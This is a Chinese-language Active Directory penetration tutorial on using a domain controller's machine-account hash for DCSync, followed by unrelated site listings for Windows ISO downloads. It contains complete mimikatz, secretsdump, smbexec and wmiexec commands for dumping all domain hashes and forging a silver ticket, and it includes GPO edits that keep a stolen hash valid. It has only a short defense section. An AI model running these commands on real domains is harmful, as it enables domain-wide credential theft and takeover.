域渗透——使用MachineAccount实现DCSync
0x00 前言
在之前的文章《域渗透——DCSync》提到过DCSync的利用条件:
获得以下任一用户的权限:
·Administrators组内的用户
· Domain Admins组内的用户
· Enterprise Admins组内的用户
·域控制器的计算机帐户
本文将要补全上篇文章中未提到的最后一种利用方法,介绍如何通过域控制器的计算机帐户口令hash实现DCSync。
0x01 简介
本文将要介绍以下内容:
·MachineAccount简介
·获得MachineAccount口令hash的方法
·使用MachineAccount实现DCSync
·防御检测
0x02 MachineAccount简介
MachineAccount是每台计算机在安装系统后默认生成的计算机帐户。
计算机帐户的密码存储在注册表的位置:HKLM\SECURITY\Policy\Secrets\$machine.ACC。
如果计算机加入域中,会将计算机帐户的密码同步到域控制器并保存在域控制器的NTDS.dit文件中。
计算机帐户的密码默认每30天自动更新,密码长度为120个字符,所以说,即使获得了计算机帐户密码的hash,也很难还原出计算机帐户的明文口令。
关闭当前计算机帐户密码自动更新的两种方法(适用于工作组):
1.修改组策略
组策略位置:
Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\
如下图:
默认未启用,如果设置为启用后,将会停止更新密码。
参考资料:
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc785826(v=ws.10)
2.直接修改注册表
注册表位置:HKLM\System\CurrentControlSet\Servicesetlogon\Parameters\
将DisablePasswordChange的值设为1。
关闭域内计算机帐户密码自动更新的两种方法(适用于域网络):
1.修改组策略
这里需要修改域组策略,在域控制器上打开Group Policy Management后,选择Default Domain Policy。
如下图:
组策略位置:
Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\
2.修改组策略的配置文件
Default Domain Policy对应的guid为31B2F340-016D-11D2-945F-00C04FB984F9
配置文件路径为:
例如我的测试环境下,路径对应为:
\\test.com\SYSVOL\test.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
修改文件GptTmpl.inf,在[Registry Values]下添加新的内容:
MACHINE\System\CurrentControlSet\Servicesetlogon\Parameters\DisablePasswordChange=4,1
如下图:
强制域控制器更新组策略,命令如下:
gpupdate /force
配置完成,将系统时间调快30天,hash保持不变。
0x03 获得MachineAccount口令hash的方法
1.通过注册表文件导出当前计算机帐户的口令hash
mimikatz命令示例:
privilege::debugtoken::elevatelsadump::secrets
返回的结果中,$machine.ACC项对应计算机帐户,如下图:
其他从注册表导出的方法可参考之前的文章《渗透技巧——通过SAM数据库获得本地用户hash》
2.使用DCSync导出所有计算机帐户的口令hash
(1)使用mimikatz
在域控制器上使用mimikatz导出域内所有用户的hash,命令示例:
mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit
其中以$字符结尾的为计算机帐户。
其他环境下的使用方法可参考之前的文章《域渗透——DCSync》。
(2)使用secretsdump.py
需要安装Python环境和Impacket包,实际使用时可以将Python代码编译成exe文件。
命令示例:
python secretsdump.py test/Administrator:DomainAdmin123!@192.168.1.1
secretsdump.py相比于mimikatz,最大的优点是支持从域外的计算机连接至域控制器。
secretsdump.py的实现原理:
使用计算机帐户口令hash通过smbexec或者wmiexec远程连接至域控制器并获得高权限,进而从注册表中导出本地帐户的hash,同时通过Dcsync或从NTDS.dit文件中导出所有域用户的hash。
3.通过漏洞CVE-2020-1472
参考资料:
https://www.secura.com/pathtoimg.php?id=2055
CVE-2020-1472能够在未授权的状态下远程修改目标计算机帐户的口令hash。
注:
CVE-2020-1472只能修改域控制器NTDS.dit文件中保存的计算机帐户hash,无法修改注册表中保存的本地计算机帐户hash。
当域控制器中NTDS.dit文件和注册表文件的计算机帐户口令hash不同步时,有可能影响系统的正常功能。
0x04 使用MachineAccount实现DCSync
例如,我们获得了域控制器DC1的计算机帐户口令hash为7da530fba3b15a2ea21ce7db8110d57b。
1.使用mimikatz
这里需要制作白银票据(Silver Ticket),接着获得LDAP服务的访问权限,细节可参考之前的文章《域渗透——Pass The Ticket》。
命令示例:
mimikatz "kerberos::golden /domain:test.com /sid:S-1-5-21-254706111-4049838133-2416586677 /target:DC1.test.com /service:LDAP /rc4:7da530fba3b15a2ea21ce7db8110d57b /user:krbtgt /ptt" "lsadump::dcsync /domain:test.com /all /csv" exit
在细节上需要注意以下方面:
·只能在域内计算机上运行,不支持域外
·/sid表示域的sid,获取方法可参考之前的文章《渗透基础——活动目录信息的获取》
· /rc4表示计算机帐户的NTLM hash
·/user:krbtgt表示伪造成用户krbtgt,生成票据
注:域sid的简单获取方法。
任一域用户的sid去除最后一位就是域的sid。
2.使用secretsdump
命令示例:
python secretsdump.py -hashes :7da530fba3b15a2ea21ce7db8110d57b test/DC1$@192.168.1.1
在细节上需要注意以下方面:
·secretsdump支持从域外的计算机连接至域控制器
·如果使用域内普通计算机帐户的口令hash连接对应的计算机,那么会失败,提示rpc_s_access_denied
·可以通过wmiexec.py或smbexec.py远程执行cmd命令
命令示例:
python smbexec.py -hashes :7da530fba3b15a2ea21ce7db8110d57b test/DC1$@192.168.1.1 whoami /privpython wmiexec.py -hashes :7da530fba3b15a2ea21ce7db8110d57b test/DC1$@192.168.1.1 whoami /priv
注:
使用计算机帐户具有高权限,如下图:
0x05 防御检测
检测DCSync后门的方法可参考《域渗透——DCSync》
站在防御的角度,如果域管理员的权限被攻击者获得,在尝试踢出攻击者的过程中,不仅需要修改域管理员用户的口令,同样需要更新计算器帐户的口令hash,检测域组策略是否被配置成开启DisablePasswordChange
0x06 小结
本文介绍了通过域控制器的计算机帐户口令hash实现DCSync的方法,分析利用思路,给出防御建议。
推荐系统
番茄花园 Windows 10 极速企业版 版本1903 2022年7月(32位) ISO镜像快速下载
语言:中文版系统大小:3.98GB系统类型:Win10番茄花园 Windows 10 32位极速企业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活
新萝卜家园电脑城专用系统 Windows10 x86 企业版 版本1507 2022年7月(32位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10新萝卜家园电脑城专用系统 Windows10 x86企业版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程
笔记本&台式机专用系统 Windows10 企业版 版本1903 2022年7月(32位) ISO镜像快速下载
语言:中文版系统大小:3.98GB系统类型:Win10笔记本台式机专用系统 Windows 10 32位企业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过
笔记本&台式机专用系统 Windows10 企业版 版本1903 2022年7月(64位) 提供下载
语言:中文版系统大小:3.98GB系统类型:Win10笔记本台式机专用系统 Windows10 64专业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的专业版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动
雨林木风 Windows10 x64 企业装机版 版本1903 2022年7月(64位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10新雨林木风 Windows10 x64 企业装机版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活
深度技术 Windows 10 x64 企业版 电脑城装机版 版本1903 2022年7月(64位) 高速下载
语言:中文版系统大小:3.98GB系统类型:Win10深度技术 Windows 10 x64 企业TLSB 电脑城装机版2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程
电脑公司 装机专用系统Windows10 x64 企业版2022年7月(64位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10电脑公司 装机专用系统 Windows10 x64 企业TLSB版2022年7月一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过
新雨林木风 Windows10 x86 企业装机版2022年7月(32位) ISO镜像高速下载
语言:中文版系统大小:3.15GB系统类型:Win10新雨林木风 Windows10 x86 专业版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的专业版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活系统,无
热门系统
- 1华硕笔记本&台式机专用系统 GhostWin7 32位正式旗舰版2018年8月(32位)ISO镜像下载
- 2雨林木风 Ghost Win7 SP1 装机版 2020年4月(32位) 提供下载
- 3深度技术 Windows 10 x86 企业版 电脑城装机版2018年10月(32位) ISO镜像免费下载
- 4电脑公司 装机专用系统Windows10 x86喜迎国庆 企业版2020年10月(32位) ISO镜像快速下载
- 5深度技术 Windows 10 x86 企业版 六一节 电脑城装机版 版本1903 2022年6月(32位) ISO镜像免费下载
- 6深度技术 Windows 10 x64 企业版 电脑城装机版2021年1月(64位) 高速下载
- 7新萝卜家园电脑城专用系统 Windows10 x64 企业版2019年10月(64位) ISO镜像免费下载
- 8新萝卜家园 GhostWin7 SP1 最新电脑城极速装机版2018年8月(32位)ISO镜像下载
- 9电脑公司Ghost Win8.1 x32 精选纯净版2022年5月(免激活) ISO镜像高速下载
- 10新萝卜家园Ghost Win8.1 X32 最新纯净版2018年05(自动激活) ISO镜像免费下载
热门文章
常用系统
- 1笔记本&台式机专用系统 GHOSTXPSP3 2020年8月 海驱版 ISO镜像高速下载
- 2新萝卜家园电脑城专用系统 Windows10 x86 企业版2020年1月(32位) ISO镜像高速下载
- 3电脑公司 装机专用系统Windows10 x64 企业装机版 版本1507 2022年4月(64位) ISO镜像高速下载
- 4笔记本&台式机专用系统 Windows10 元旦特别 企业版 2020年1月(64位) 提供下载
- 5深度技术 Windows 10 x64 企业版 电脑城装机版2020年1月(64位) 高速下载
- 6深度技术Ghost Win8.1 x32位 特别纯净版2022年6月(免激活) ISO镜像高速下载
- 7雨林木风 Windows10 x64 企业装机版 版本1903 2022年2月(64位) ISO镜像高速下载
- 8深度技术 Windows 10 x64 企业版 电脑城装机版2020年6月(64位) 高速下载
- 9笔记本&台式机专用系统 Windows10 企业版 2021年3月(32位) ISO镜像快速下载
- 10番茄花园 GhostWin7 SP1 最新电脑城海驱极速装机版2018年8月(32位)ISO镜像下载